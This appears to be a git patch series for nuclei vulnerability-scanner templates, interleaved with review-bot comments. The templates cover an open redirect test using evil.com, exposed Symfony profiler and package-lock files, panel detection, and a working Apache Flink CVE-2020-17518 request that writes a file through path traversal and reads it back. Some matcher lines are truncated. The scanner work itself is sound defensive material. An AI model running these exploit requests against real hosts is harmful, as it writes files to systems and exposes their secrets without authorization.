From c5838760feeb96cf4f335f67b876ebf200b91cb3 Mon Sep 17 00:00:00 2001 From: Gal Nagli <35578316+NagliNagli@users.noreply.github.com> Date: Tue, 29 Dec 2020 00:51:40 +0200 Subject: [PATCH 01/85] Create thinkific-redirect.yaml --- vulnerabilities/thinkific-redirect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/thinkific-redirect.yaml diff --git a/vulnerabilities/thinkific-redirect.yaml b/vulnerabilities/thinkific-redirect.yaml new file mode 100644 index 0000000000..01d8b2f282 --- /dev/null +++ b/vulnerabilities/thinkific-redirect.yaml @@ -0,0 +1,24 @@ +id: thinkific-redirect + +info: + name: Open Redirect vulnerability on thinkific websites + author: Gal Nagli + severity: Medium + + +requests: + - method: GET + + path: + - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" + + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - " Date: Tue, 29 Dec 2020 11:30:30 +0530 Subject: [PATCH 02/85] Update thinkific-redirect.yaml --- vulnerabilities/thinkific-redirect.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/thinkific-redirect.yaml b/vulnerabilities/thinkific-redirect.yaml index 01d8b2f282..17873bceb3 100644 --- a/vulnerabilities/thinkific-redirect.yaml +++ b/vulnerabilities/thinkific-redirect.yaml @@ -1,16 +1,15 @@ id: thinkific-redirect info: - name: Open Redirect vulnerability on thinkific websites + name: Thinkific Open URL Redirect author: Gal Nagli - severity: Medium - + severity: low requests: - method: GET path: - - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" + - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://example.com" matchers-condition: and matchers: 
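Review bot: The matcher block at the end of the new thinkific-redirect.yaml confirms the redirect only with `status: 302` and a body word, so any 302 whose body happens to contain that fragment (for example a bounce to a login page) would be reported, while the `Location` header is what actually demonstrates that `error_url` is reflected. A word matcher with `part: header` whose `words:` entry is `Location:` followed by the same host supplied in `error_url` would tie the finding to the header that proves it. The final `words:` entry is garbled in this rendering, and patch 02/85 later rewrites this matcher with lines that are also not legible here, so I cannot tell whether that follow-up already does this.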
@@ -19,6 +18,5 @@ requests: - 302 - type: word words: - - " Date: Wed, 6 Jan 2021 14:00:51 +0000 Subject: [PATCH 03/85] Locate Fortigate Fortiweb panels, In preparation for the new set of unauthenticated vulnerabilities (https://twitter.com/ptswarm/status/1346806951326396416) --- panels/fortiweb-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 panels/fortiweb-panel.yaml diff --git a/panels/fortiweb-panel.yaml b/panels/fortiweb-panel.yaml new file mode 100644 index 0000000000..060b97d997 --- /dev/null +++ b/panels/fortiweb-panel.yaml @@ -0,0 +1,24 @@ +id: fortiweb-login + +info: + name: Fortinet FortiWeb Login Panel + author: PR3R00T + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + matchers-condition: and + matchers: + - type: word + words: + - "Please login" + - "ftnt-fortinet-grid" + - "main-fortiweb.css" + condition: and + part: body + + - type: status + status: + - 200 From b5538255a3f22adca8c64b44be092419a1965556 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Jan 2021 14:33:55 +0000 Subject: [PATCH 04/85] Auto Update README [Wed Jan 6 14:33:55 UTC 2021] :robot: --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 69b5627dc8..936a49433e 100644 --- a/README.md +++ b/README.md 
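Review bot: The template declares `id: fortiweb-login` while the file is `panels/fortiweb-panel.yaml`; the other new templates in this series keep the id equal to the file stem (e.g. `id: thinkific-redirect` in patch 01/85), so this should read `id: fortiweb-panel` or the file should be renamed to match. The info block also carries no `description:` or `reference:`, although the subject line itself cites the advisory thread that motivated the check; recording that link as `reference:` would give whoever triages a hit the context for why an exposed FortiWeb login panel matters.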
@@ -11,12 +11,12 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. -### Nuclei templates `v7.3.6` overview +### Nuclei templates `v7.3.7` overview | Templates | Counts | Templates | Counts | | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | | cves | 146 | files | 48 | -| vulnerabilities | 42 | panels | 49 | +| vulnerabilities | 42 | panels | 50 | | technologies | 41 | security-misconfiguration | 29 | | workflows | 17 | tokens | 8 | | dns | 6 | fuzzing | 6 | @@ -25,7 +25,7 @@ An overview of the nuclei template directory including number of templates and H | wordlists | 1 | misc | 14 | -### Nuclei templates `v7.3.6` tree overview +### Nuclei templates `v7.3.7` tree overview
Nuclei templates @@ -286,6 +286,7 @@ An overview of the nuclei template directory including number of templates and H │   ├── crxde.yaml │   ├── docker-api.yaml │   ├── fortinet-fortigate-panel.yaml +│   ├── fortiweb-panel.yaml │   ├── github-enterprise-detect.yaml │   ├── gitlab-detect.yaml │   ├── globalprotect-panel.yaml @@ -479,7 +480,7 @@ An overview of the nuclei template directory including number of templates and H
-**24 directories, 420 files**.
+**24 directories, 421 files**.
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.
From 32143aa738c76edc720c072c7784c36b76fa316f Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Wed, 6 Jan 2021 23:08:45 +0530
Subject: [PATCH 05/85] Create CVE-2020-17518.yaml
---
 cves/2020/CVE-2020-17518.yaml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 cves/2020/CVE-2020-17518.yaml
diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml
new file mode 100644
index 0000000000..57bb7ccced
--- /dev/null
+++ b/cves/2020/CVE-2020-17518.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-17518
+
+info:
+ name: Apache Flink Upload Path Traversal
+ author: pd-team
+ severity: critical
+ reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
+
+requests:
+ - raw:
+ - |
+ POST /jars/upload HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
+ Content-Length: 187
+
+ ------WebKitFormBoundaryoZ8meKnrrso89R6Y
+ Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
+
+ test-poc
+ ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
+
+ - method: GET
+ path:
+ - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this.
From 2471e9b7768525527756fec55e70b14f6d66b21c Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 6 Jan 2021 17:39:24 +0000
Subject: [PATCH 06/85] Auto Update README [Wed Jan 6 17:39:24 UTC 2021] :robot:
---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
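Review bot: The raw request in the new CVE-2020-17518.yaml writes a file to the scanned host (`filename="../../../../../../../tmp/poc"`, body `test-poc`) and, as the trailing comment admits, depends on the separate CVE-2020-17519 read traversal to observe it, yet the info block says nothing about either fact. Add a `description:` stating that the check is intrusive and leaves `/tmp/poc` behind, and that a host patched for CVE-2020-17519 but still vulnerable to CVE-2020-17518 will produce a false negative, so operators can decide whether to run it and how to read a miss. In the dsl matcher `contains(body, "test-poc") == true && status_code == 200` the `== true` is redundant; `contains(body, "test-poc") && status_code == 200` says the same thing. The hard-coded `Content-Length: 187` also has to be recomputed by hand if the boundary, filename or body is ever edited; I have not verified whether nuclei recomputes it for raw requests, so a comment on that line noting the dependency would help the next editor.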
diff --git a/README.md b/README.md index 936a49433e..c017623950 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H | Templates | Counts | Templates | Counts | | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | -| cves | 146 | files | 48 | +| cves | 147 | files | 48 | | vulnerabilities | 42 | panels | 50 | | technologies | 41 | security-misconfiguration | 29 | | workflows | 17 | tokens | 8 | @@ -151,6 +151,7 @@ An overview of the nuclei template directory including number of templates and H │   ├── CVE-2020-16952.yaml │   ├── CVE-2020-17505.yaml │   ├── CVE-2020-17506.yaml +│   ├── CVE-2020-17518.yaml │   ├── CVE-2020-17519.yaml │   ├── CVE-2020-2096.yaml │   ├── CVE-2020-2140.yaml @@ -480,7 +481,7 @@ An overview of the nuclei template directory including number of templates and H -**24 directories, 421 files**. +**24 directories, 422 files**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. From a4c8f1c8ffe2aae1de0ee0498b01d4ddf809c128 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Wed, 6 Jan 2021 23:23:28 +0530 Subject: [PATCH 07/85] Added syfmony-profiler --- files/syfmony-profiler.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 files/syfmony-profiler.yaml diff --git a/files/syfmony-profiler.yaml b/files/syfmony-profiler.yaml new file mode 100644 index 0000000000..a561d00216 --- /dev/null +++ b/files/syfmony-profiler.yaml 
@@ -0,0 +1,25 @@ +id: syfmony-profiler + +info: + name: SymfonyProfiler information leakage + author: wabafet + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}/_profiler/phpinfo.php" + - "{{BaseURL}}/_profiler/phpinfo" + + matchers-condition: and + matchers: + - type: word + words: + - "$_SERVER['SERVER_NAME']" + - "$_ENV['APP_SECRET']" + - "$_ENV['SYMFONY_DOTENV_VARS']" + condition: or + + - type: status + status: + - 200 From f513e6739ae5d3189c199357e6fddd49909e5b25 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Jan 2021 17:54:10 +0000 Subject: [PATCH 08/85] Auto Update README [Wed Jan 6 17:54:10 UTC 2021] :robot: --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c017623950..950c140f74 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H | Templates | Counts | Templates | Counts | | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | -| cves | 147 | files | 48 | +| cves | 147 | files | 49 | | vulnerabilities | 42 | panels | 50 | | technologies | 41 | security-misconfiguration | 29 | | workflows | 17 | tokens | 8 | @@ -235,6 +235,7 @@ An overview of the nuclei template directory including number of templates and H │   ├── server-status-localhost.yaml │   ├── shell-history.yaml │   ├── sql-dump.yaml +│   ├── syfmony-profiler.yaml │   ├── telerik-dialoghandler-detect.yaml │   ├── telerik-fileupload-detect.yaml │   ├── tomcat-scripts.yaml @@ -481,7 +482,7 @@ An overview of the nuclei template directory including number of templates and H -**24 directories, 422 files**. +**24 directories, 423 files**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
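Review bot: Both the path `files/syfmony-profiler.yaml` and `id: syfmony-profiler` misspell Symfony; the typo is then copied into the README tree by patch 08/85 and carried through the directory move in patch 19/85, so correcting it later costs a rename plus an id change — better to fix it in this commit as `symfony-profiler`. The info block has no `description:` or `reference:`, although the matched strings `$_ENV['APP_SECRET']` and `$_ENV['SYMFONY_DOTENV_VARS']` show the hit means application secrets are readable; a one-line description saying the `_profiler` endpoint exposes environment variables and must be disabled outside development would make a positive result actionable. Given that `APP_SECRET` is among the values exposed, `severity: medium` is worth a second look.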
From ebe6aded7c82775f779b24c8f1f40eeb0a62c6c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Jan 2021 18:08:48 +0000 Subject: [PATCH 09/85] Auto Update README [Wed Jan 6 18:08:48 UTC 2021] :robot: --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 950c140f74..6bc48cbd79 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H | Templates | Counts | Templates | Counts | | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | -| cves | 147 | files | 49 | +| cves | 147 | files | 50 | | vulnerabilities | 42 | panels | 50 | | technologies | 41 | security-misconfiguration | 29 | | workflows | 17 | tokens | 8 | @@ -239,6 +239,7 @@ An overview of the nuclei template directory including number of templates and H │   ├── telerik-dialoghandler-detect.yaml │   ├── telerik-fileupload-detect.yaml │   ├── tomcat-scripts.yaml +│   ├── trace-axd-detect.yaml │   ├── wadl-files.yaml │   ├── web-config.yaml │   ├── wordpress-db-backup.yaml @@ -482,7 +483,7 @@ An overview of the nuclei template directory including number of templates and H -**24 directories, 423 files**. +**24 directories, 424 files**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. From 8a21f73b95e6a45049c533cc21ac515f93425903 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Wed, 6 Jan 2021 23:48:53 +0530 Subject: [PATCH 10/85] Update phpinfo.yaml --- files/phpinfo.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/files/phpinfo.yaml b/files/phpinfo.yaml index af5b47b16c..61cd1b1dc6 100644 --- a/files/phpinfo.yaml +++ b/files/phpinfo.yaml 
@@ -11,7 +11,6 @@ requests:
 - "{{BaseURL}}/php.php"
 - "{{BaseURL}}/phpinfo.php"
 - "{{BaseURL}}/info.php"
- - "{{BaseURL}}/_profiler/phpinfo"
 - "{{BaseURL}}/infophp.php"
 - "{{BaseURL}}/php_info.php"
 - "{{BaseURL}}/test.php"
From a316468af31f89f52c0c68e30ed9eeaaa06554cf Mon Sep 17 00:00:00 2001
From: Afaq <45089292+afaq1337@users.noreply.github.com>
Date: Thu, 7 Jan 2021 19:51:12 +0500
Subject: [PATCH 11/85] Add files via upload
---
 files/package-lock-json.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 files/package-lock-json.yaml
diff --git a/files/package-lock-json.yaml b/files/package-lock-json.yaml
new file mode 100644
index 0000000000..4db86156a6
--- /dev/null
+++ b/files/package-lock-json.yaml
@@ -0,0 +1,29 @@
+id: package-lock-json
+
+info:
+ name: npm package-lock.json information disclosure
+ author: afaq & geeknik
+ severity: info
+ description: npm packages contain a file, usually in the project root, called package-lock.json - this file contains all the dependencies and verison details of the project.
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/package-lock.json"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "name"
+ - "version"
+ condition: and
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
From b6328c0951659592073cef8c6ebd4f6ccf9cedf9 Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Thu, 7 Jan 2021 09:57:51 -0600
Subject: [PATCH 12/85] Create monit-detect.yaml
---
 technologies/monit-detect.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 technologies/monit-detect.yaml
diff --git a/technologies/monit-detect.yaml b/technologies/monit-detect.yaml
new file mode 100644
index 0000000000..b1ce2c8ff8
--- /dev/null
+++ b/technologies/monit-detect.yaml
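Review bot: The first word matcher in the new package-lock-json.yaml needs only `"name"` and `"version"` to appear, combined with an `application/json` content type and a 200, which almost any JSON document satisfies; hosts that answer unknown paths with a JSON body (common for SPAs and API gateways) will be reported as leaking a lockfile. Adding a key that only the lockfile format carries, such as `"lockfileVersion"`, to the `words:` list would remove most of those false positives. `verison` in the description is a typo, and the file lacks a trailing newline. Patch 15/85 deletes this file and folds the path into package-json.yaml, so the matcher concern moves there.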
@@ -0,0 +1,31 @@ +id: monit-detect + +info: + name: Detect Monit Dashboard + author: geeknik + description: Monit is a small Open Source utility for managing and monitoring Unix systems -- https://mmonit.com/monit/ + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - 401 + condition: or + + - type: regex + part: header + regex: + - monit+ + + extractors: + - type: kval + part: header + kval: + - Server From 87ec61f0de3bc59be12e6fcbde7bef7d41580095 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Fri, 8 Jan 2021 00:19:39 +0530 Subject: [PATCH 14/85] Update CVE-2020-17518.yaml --- cves/2020/CVE-2020-17518.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 57bb7ccced..dd483cc1a0 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -15,10 +15,10 @@ requests: Accept-Language: en Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Length: 187 - + ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" - + test-poc ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- From eb66806f5c0d352651565add8c6b2741a5f5dd85 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Fri, 8 Jan 2021 00:26:47 +0530 Subject: [PATCH 15/85] updated template to add new endpoint --- files/package-json.yaml | 3 ++- files/package-lock-json.yaml | 29 ----------------------------- 2 files changed, 2 insertions(+), 30 deletions(-) delete mode 100644 files/package-lock-json.yaml diff --git a/files/package-json.yaml b/files/package-json.yaml index e03b1a75ae..44202a689f 100644 --- a/files/package-json.yaml +++ b/files/package-json.yaml 
@@ -2,7 +2,7 @@ id: package-json info: name: npm package.json disclosure - author: geeknik + author: geeknik & afaq severity: info description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/package.json" + - "{{BaseURL}}/package-lock.json" matchers-condition: and matchers: diff --git a/files/package-lock-json.yaml b/files/package-lock-json.yaml deleted file mode 100644 index 4db86156a6..0000000000 --- a/files/package-lock-json.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: package-lock-json - -info: - name: npm package-lock.json information disclosure - author: afaq & geeknik - severity: info - description: npm packages contain a file, usually in the project root, called package-lock.json - this file contains all the dependencies and verison details of the project. - -requests: - - method: GET - path: - - "{{BaseURL}}/package-lock.json" - - matchers-condition: and - matchers: - - type: word - words: - - "name" - - "version" - condition: and - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 \ No newline at end of file From 07d2aec8b623f5d068e0274b2e79197e7273c905 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Fri, 8 Jan 2021 00:48:22 +0530 Subject: [PATCH 16/85] Update monit-detect.yaml --- technologies/monit-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/monit-detect.yaml b/technologies/monit-detect.yaml index b1ce2c8ff8..5a46f702cf 100644 --- a/technologies/monit-detect.yaml +++ b/technologies/monit-detect.yaml @@ -19,10 +19,10 @@ requests: - 401 condition: or - - type: regex + - type: word part: header - regex: - - monit+ + words: + - 'Server: monit' extractors: - type: kval From 81e207870e1272b8cfd4f28957ff9bd399e9b119 Mon Sep 17 00:00:00 2001 
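Review bot: The added `- "{{BaseURL}}/package-lock.json"` path in package-json.yaml now shares that template's matchers, which lie outside this hunk, while the `description` in the first hunk of the file still speaks only of package.json; it should also say that the lockfile, i.e. the full pinned dependency tree, is probed, since that is the more useful disclosure for an attacker to see and for a defender to remove. The deleted package-lock-json.yaml matched only on `"name"` and `"version"`, so please confirm the surviving matchers are specific enough that a generic JSON response at this path is not reported as a hit.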
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Fri, 8 Jan 2021 00:51:12 +0530 Subject: [PATCH 17/85] Update tech-detect.yaml --- technologies/tech-detect.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 1b73a91967..6e7bd9c755 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -2740,4 +2740,10 @@ requests: - "pfSense - Login" - "maintained by Netgate" part: body - condition: and \ No newline at end of file + condition: and + + - type: word + name: monit + part: header + words: + - 'Server: monit' \ No newline at end of file From 7b749674d4b0cc874dd5a96d062aadf80094a385 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Fri, 8 Jan 2021 00:51:59 +0530 Subject: [PATCH 18/85] Delete monit-detect.yaml --- technologies/monit-detect.yaml | 31 ------------------------------- 1 file changed, 31 deletions(-) delete mode 100644 technologies/monit-detect.yaml diff --git a/technologies/monit-detect.yaml b/technologies/monit-detect.yaml deleted file mode 100644 index 5a46f702cf..0000000000 --- a/technologies/monit-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: monit-detect - -info: - name: Detect Monit Dashboard - author: geeknik - description: Monit is a small Open Source utility for managing and monitoring Unix systems -- https://mmonit.com/monit/ - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - 401 - condition: or - - - type: word - part: header - words: - - 'Server: monit' - - extractors: - - type: kval - part: header - kval: - - Server From 21ea71e4c18b0e1e476c067fd77cc43cb5599e7a Mon Sep 17 00:00:00 2001 
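Review bot: The new monit matcher appended to tech-detect.yaml leaves the file without a trailing newline — both sides of the hunk end with `\ No newline at end of file` — so the next matcher added will again show a spurious change on `- 'Server: monit'`; terminate the file with a newline. The same `Server: monit` header match is also introduced into monit-detect.yaml by patch 16/85; patch 18/85 then deletes that standalone template, so tech-detect.yaml becomes the only place this detection lives, which is worth a word in the commit message.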
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Fri, 8 Jan 2021 17:11:53 +0530 Subject: [PATCH 19/85] moving to new directory structure --- .../grafana-default-credential.yaml | 0 .../rabbitmq-default-admin.yaml | 0 .../solarwinds-default-admin.yaml | 0 .../tomcat-manager-default.yaml | 0 {files => exposed-files}/apc-info.yaml | 0 {files => exposed-files}/cgi-test-page.yaml | 0 {files => exposed-files}/composer-config.yaml | 0 {files => exposed-files}/docker-registry.yaml | 0 {files => exposed-files}/domcfg-page.yaml | 0 {files => exposed-files}/druid-monitor.yaml | 0 {files => exposed-files}/drupal-install.yaml | 0 {files => exposed-files}/ds_store.yaml | 0 {files => exposed-files}/elasticsearch.yaml | 0 {files => exposed-files}/elmah-log-file.yaml | 0 {files => exposed-files}/error-logs.yaml | 0 {files => exposed-files}/exposed-kibana.yaml | 0 {files => exposed-files}/exposed-svn.yaml | 0 {files => exposed-files}/filezilla.yaml | 0 {files => exposed-files}/firebase-detect.yaml | 0 {files => exposed-files}/git-config.yaml | 0 {files => exposed-files}/graylog-api-browser.yaml | 0 {files => exposed-files}/htpasswd-detection.yaml | 0 {files => exposed-files}/jkstatus-manager.yaml | 0 {files => exposed-files}/jolokia.yaml | 0 {files => exposed-files}/laravel-env.yaml | 0 {files => exposed-files}/lazy-file.yaml | 0 {files => exposed-files}/magento-config.yaml | 0 {files => exposed-files}/owncloud-config.yaml | 0 {files => exposed-files}/package-json.yaml | 0 {files => exposed-files}/php-errors.yaml | 0 {files => exposed-files}/phpinfo.yaml | 0 {files => exposed-files}/public-tomcat-instance.yaml | 0 {files => exposed-files}/redmine-db-config.yaml | 0 {files => exposed-files}/server-private-keys.yaml | 0 {files => exposed-files}/server-status-localhost.yaml | 0 {files => exposed-files}/shell-history.yaml | 0 {files => exposed-files}/sql-dump.yaml | 0 {files => exposed-files}/syfmony-profiler.yaml | 0 {files => 
exposed-files}/telerik-dialoghandler-detect.yaml | 0 {files => exposed-files}/telerik-fileupload-detect.yaml | 0 {files => exposed-files}/tomcat-scripts.yaml | 0 {files => exposed-files}/trace-axd-detect.yaml | 0 {files => exposed-files}/wadl-files.yaml | 0 {files => exposed-files}/web-config.yaml | 0 {files => exposed-files}/wordpress-db-backup.yaml | 0 {files => exposed-files}/wordpress-debug-log.yaml | 0 {files => exposed-files}/wordpress-directory-listing.yaml | 0 {files => exposed-files}/wordpress-emergency-script.yaml | 0 {files => exposed-files}/wordpress-installer-log.yaml | 0 {files => exposed-files}/wordpress-tmm-db-migrate.yaml | 0 {files => exposed-files}/wordpress-user-enumeration.yaml | 0 {files => exposed-files}/wsdl-detect.yaml | 0 {files => exposed-files}/xprober-service.yaml | 0 {files => exposed-files}/zip-backup-files.yaml | 0 {panels => exposed-panels}/adminer-panel.yaml | 0 {panels => exposed-panels}/aims-password-mgmt-client.yaml | 0 {panels => exposed-panels}/atlassian-crowd-panel.yaml | 0 {panels => exposed-panels}/cisco-asa-panel.yaml | 0 {panels => exposed-panels}/citrix-adc-gateway-detect.yaml | 0 {panels => exposed-panels}/citrix-vpn-detect.yaml | 0 {panels => exposed-panels}/compal.yaml | 0 {panels => exposed-panels}/crxde.yaml | 0 {panels => exposed-panels}/docker-api.yaml | 0 {panels => exposed-panels}/fortinet-fortigate-panel.yaml | 0 {panels => exposed-panels}/fortiweb-panel.yaml | 0 {panels => exposed-panels}/github-enterprise-detect.yaml | 0 {panels => exposed-panels}/gitlab-detect.yaml | 0 {panels => exposed-panels}/globalprotect-panel.yaml | 0 {panels => exposed-panels}/go-anywhere-client.yaml | 0 {panels => exposed-panels}/grafana-detect.yaml | 0 {panels => exposed-panels}/identityguard-selfservice-entrust.yaml | 0 .../iomega-lenovo-emc-shared-nas-detect.yaml | 0 {panels => exposed-panels}/jenkins-asyncpeople.yaml | 0 {panels => exposed-panels}/jmx-console.yaml | 0 {panels => exposed-panels}/kubernetes-pods.yaml | 0 {panels => 
exposed-panels}/manage-engine-admanager-panel.yaml | 0 {panels => exposed-panels}/mobileiron-login.yaml | 0 {panels => exposed-panels}/netscaler-gateway.yaml | 0 {panels => exposed-panels}/network-camera-detect.yaml | 0 {panels => exposed-panels}/oipm-detect.yaml | 0 {panels => exposed-panels}/parallels-html-client.yaml | 0 {panels => exposed-panels}/phpmyadmin-panel.yaml | 0 {panels => exposed-panels}/polycom-admin-detect.yaml | 0 {panels => exposed-panels}/pulse-secure-panel.yaml | 0 {panels => exposed-panels}/rabbitmq-dashboard.yaml | 0 {panels => exposed-panels}/rsa-self-service.yaml | 0 {panels => exposed-panels}/sap-hana-xsengine-panel.yaml | 0 {panels => exposed-panels}/sap-netweaver-detect.yaml | 0 {panels => exposed-panels}/sap-recon-detect.yaml | 0 {panels => exposed-panels}/solarwinds-orion.yaml | 0 {panels => exposed-panels}/sonarqube-login.yaml | 0 {panels => exposed-panels}/sonicwall-management-panel.yaml | 0 {panels => exposed-panels}/sonicwall-sslvpn-panel.yaml | 0 {panels => exposed-panels}/sophos-fw-version-detect.yaml | 0 {panels => exposed-panels}/supervpn-panel.yaml | 0 {panels => exposed-panels}/swagger-panel.yaml | 0 {panels => exposed-panels}/tikiwiki-cms.yaml | 0 {panels => exposed-panels}/traefik-dashboard.yaml | 0 {panels => exposed-panels}/virtual-ema-detect.yaml | 0 {panels => exposed-panels}/weave-scope-dashboard-detect.yaml | 0 {panels => exposed-panels}/webeditors.yaml | 0 {panels => exposed-panels}/webmin-panel.yaml | 0 {panels => exposed-panels}/workspace-one-uem.yaml | 0 .../workspaceone-uem-airwatch-dashboard-detect.yaml | 0 .../tokens}/amazon-mws-auth-token-value.yaml | 0 {tokens => exposed-tokens/tokens}/aws-access-key-value.yaml | 0 {tokens => exposed-tokens/tokens}/credentials-disclosure.yaml | 0 {tokens => exposed-tokens/tokens}/fcm-server-key.yaml | 0 {tokens => exposed-tokens/tokens}/google-api-key.yaml | 0 {tokens => exposed-tokens/tokens}/http-username-password.yaml | 0 {tokens => 
exposed-tokens/tokens}/mailchimp-api-key.yaml | 0 {tokens => exposed-tokens/tokens}/slack-access-token.yaml | 0 {payloads => helpers/payloads}/CVE-2020-5776.csv | 0 {payloads => helpers/payloads}/CVE-2020-6287.xml | 0 {wordlists => helpers/wordlists}/wp-plugins.txt | 0 {misc => miscellaneous}/basic-cors-flash.yaml | 0 {misc => miscellaneous}/dir-listing.yaml | 0 {misc => miscellaneous}/htaccess-config.yaml | 0 {misc => miscellaneous}/missing-csp.yaml | 0 {misc => miscellaneous}/missing-hsts.yaml | 0 {misc => miscellaneous}/missing-x-frame-options.yaml | 0 {misc => miscellaneous}/ntlm-directories.yaml | 0 {misc => miscellaneous}/old-copyright.yaml | 0 {misc => miscellaneous}/robots.txt.yaml | 0 {misc => miscellaneous}/security.txt.yaml | 0 {misc => miscellaneous}/trace-method.yaml | 0 {misc => miscellaneous}/unencrypted-bigip-ltm-cookie.yaml | 0 {misc => miscellaneous}/wp-xmlrpc.yaml | 0 {misc => miscellaneous}/xml-schema-detect.yaml | 0 .../aem-groovyconsole.yaml | 0 .../apache-tomcat-snoop.yaml | 0 .../aspx-debug-mode.yaml | 0 {security-misconfiguration => misconfiguration}/basic-cors.yaml | 0 .../django-debug-detect.yaml | 0 .../drupal-user-enum-ajax.yaml | 0 .../drupal-user-enum-redirect.yaml | 0 .../exposed-service-now.yaml | 0 .../front-page-misconfig.yaml | 0 .../generic-detections}/basic-xss-prober.yaml | 0 .../generic-detections}/general-tokens.yaml | 0 .../generic-detections}/top-15-xss.yaml | 0 